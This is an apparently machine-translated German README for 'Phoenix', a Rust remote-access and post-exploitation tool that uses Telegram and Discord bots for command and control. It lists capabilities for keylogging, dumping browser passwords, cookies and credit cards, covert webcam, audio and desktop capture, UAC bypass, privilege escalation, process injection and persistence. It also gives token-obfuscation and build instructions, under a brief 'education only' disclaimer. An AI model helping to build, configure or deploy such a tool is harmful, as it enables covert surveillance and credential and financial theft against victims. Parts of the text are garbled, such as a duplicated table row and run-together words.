
Post-Exploitation-Framework, das vertrauenswürdige Seiten wie Telegram und Discord für C2 missbraucht.
Phoenix ist ein asynchrones Post-Exploitation-Framework, das vertrauenswürdige Websites für C2 missbraucht.
Phoenix unterstützt derzeit die folgenden Plattformen über deren Bot-APIs:
Phoenix bietet die folgenden grundlegenden Funktionen:
Command Description
------- -----------
/hello Check if the bot is acive on the host
/help Print help message
/persist Maintain access after reboot. (Requires UAC bypass)
/sleep Sleep. Usage: /sleep (seconds)
/reboot Reboot the host
/shutdown Shutdown the host
/exit End the session
/self_del Self-delete the executable
/pwd Print working directory
/dir List working directory
/cd Change directory. Usage: /cd (path)
/search Search for files. Usage: /search (path) (file)
/upload Upload files. Usage: /upload (file), /upload *.jpg
/uid Get the user id
/users List the available users
/privs List the privileges
/sysinfo Print system informations
/location Retrieve geolocation informations
/hw List installed hardware
/sw list installed software
/drv List connected drives
/net List network Adapters
/pid Show the current process ID
/ps List running processes
/pkill Kill a process by ID
/exec Execute a command
/chat Display a custom message
/webcam_list List available webcams
/webcam_snap Take a webcam snapshot: Usage: /webcam_snap (index)
/recaudio Record audio. Usage: /recaudio (seconds)
/screenshot Take a screenshot
/keylog Start keylogging
/keylog_stop Stop keylogging threads
/browser_dump Dump browser data
/clipboard Dump clipboard data
/stream_desktop Live stream the host desktop
/stream_webcam Live stream the host webcam
/stream_stop Stop live streaming threads *** needs work
/get_system Elevate privileges to SYSTEM
/bypass_uac Bypass UAC prompts
/inject Inject a target process. Usage: /inject (dll_path)
[!NOTE]
Phoenix unterstützt die Datensammlung der folgenden Browser:
Chrome,Edge,Braveundfirefox.
- Die Entschlüsselung von Firefox-Passwörtern wird derzeit nicht unterstützt!
- Das Chromium-Dumping-Modul basiert auf dem Open-Source-Projekt: https://github.com/Maldev-Academy/DumpBrowserSecrets/tree/main/DllExtractChromiumSecrets.
Die folgende Tabelle zeigt die Liste der gesammelten Daten für jeden unterstützten Browser:
Phoenix implementiert derzeit eine einfache XOR-Verschleierung, was bedeutet, dass die Tokens weiterhin fest im Binärcode codiert sind. Die Verschleierung ist nur eine grundlegende Verteidigung, um eine beiläufige Zeichenketteninspektion zu verhindern, nicht um erfahrene Reverse Engineers aufzuhalten.
Ngrok ist für das Tunneln des Live-Streaming-Verkehrs unerlässlich. Ohne ein gültiges Ngrok-Token kann Phoenix den Desktop/die Webcam des Hosts nicht streamen.
/src/tunnel.rs die Variable token durch Ihr tatsächliches Token:let token = obfuscate!("YOUR_NGROK_TOKEN");
/src/telegram.rs die Variablen bot_token und id durch Ihren tatsächlichen Bot-Token und Ihre Chat-ID:let bot_token = obfuscate!("YOUR_TELEGRAM_TOKEN");
let id: i64 = 123456789;
> cargo build --release --bin telegram
/src/discord.rs die Variable token durch Ihren tatsächlichen Bot-Token:let token = obfuscate!("YOUR_DISCORD_TOKEN");
> cargo build --release --bin discord
[!IMPORTANT] Die generierten Binärdateien erfordern Administratorrechte, um ordnungsgemäß zu funktionieren.
Bildschirmfoto
[!CAUTION] Dieses Projekt wird nur zu Bildungs- und Forschungszwecken bereitgestellt. Sie sind dafür verantwortlich, sicherzustellen, dass Sie über die entsprechende Genehmigung verfügen, bevor Sie dieses Tool verwenden. Der Autor übernimmt keine Haftung für Missbrauch.
Beiträge und Vorschläge sind willkommen! Wenn Sie "ethische" Geschäftsanfragen haben oder zusammenarbeiten möchten, kontaktieren Sie uns gerne unter: [email protected]
| Chrome/Edge/Brave | Firefox |
|---|
| Verlauf | ✅ | ✅ |
| Cookies | ✅ | ✅ |
| Auto-Ausfüllungen | ✅ | ✅ |
| Kreditkarten | ✅ | ✅ |
| Cookies | ✅ | ✅ |
| Anmeldungen | ✅ | ❌ |